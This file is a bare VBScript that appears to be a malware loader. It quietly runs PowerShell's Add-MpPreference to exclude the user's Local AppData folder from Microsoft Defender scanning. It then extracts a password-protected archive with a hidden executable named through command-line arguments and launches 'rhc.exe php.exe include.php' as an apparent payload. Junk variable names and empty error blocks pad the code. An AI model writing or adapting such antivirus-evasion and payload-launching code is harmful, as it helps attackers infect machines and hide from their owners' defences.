Option Explicit
Dim waggishHebection
waggishHebection = "DistancecemeteryLaus"
Dim ps2, uDataName, fDataName
Dim objShell, localAppDataPath, objFSO, folderPath, sourceFile, destinationFile
Dim destinationFileC, ps1, exePath, arguments, command, exitCode, psCommand, scriptPath, objFile
ps1 = WScript.Arguments.Item(0)
ps2 = WScript.Arguments.Item(1)
uDataName = WScript.Arguments.Item(2)
fDataName = WScript.Arguments.Item(3)
Set objShell = CreateObject("WScript.Shell")
localAppDataPath = objShell.ExpandEnvironmentStrings("%LOCALAPPDATA%")
Set objFSO = CreateObject("Scripting.FileSystemObject")
scriptPath = WScript.ScriptFullName

Dim fTemp
fTemp = "cat"
If objFSO.FolderExists(fTemp) Then
    objFSO.DeleteFolder fTemp, True
    If Err.Number = 0 Then
    Else
    End If
Else
End If


If Len(localAppDataPath) > 0 Then
    folderPath = objFSO.BuildPath(localAppDataPath, ps2)
    psCommand = "Add-MpPreference -ExclusionPath """"" & localAppDataPath & """"""
	command = "powershell.exe -Command """ & psCommand & """"
	exitCode = objShell.Run(command, 0, True)
	objShell.CurrentDirectory = folderPath
	exePath = objFSO.BuildPath(folderPath, uDataName &".exe")
	arguments = "x "+fDataName+" -p"""+ps1+""" -y -aoa"
	command = """" & exePath & """ " & arguments

	fTemp = "cat"
	If objFSO.FolderExists(fTemp) Then
		objFSO.DeleteFolder fTemp, True
		If Err.Number = 0 Then
		Else
		End If
	Else
	End If

	exitCode = objShell.Run(command, 0, True)

	fTemp = "cat"
	If objFSO.FolderExists(fTemp) Then
		objFSO.DeleteFolder fTemp, True
		If Err.Number = 0 Then
		Else
		End If
	Else
	End If
	Dim x1,x2,x3
	x1 = "rhc.exe"
	x2 = "php.exe"
	x3 = "include.php"
	exitCode = objShell.Run(x1+" "+ x2 + " "+ x3, 1, True)
	If objFSO.FileExists(destinationFileC) Then
		objFSO.DeleteFile destinationFileC
	End If
    Set objFSO = Nothing
End If
Set objShell = Nothing
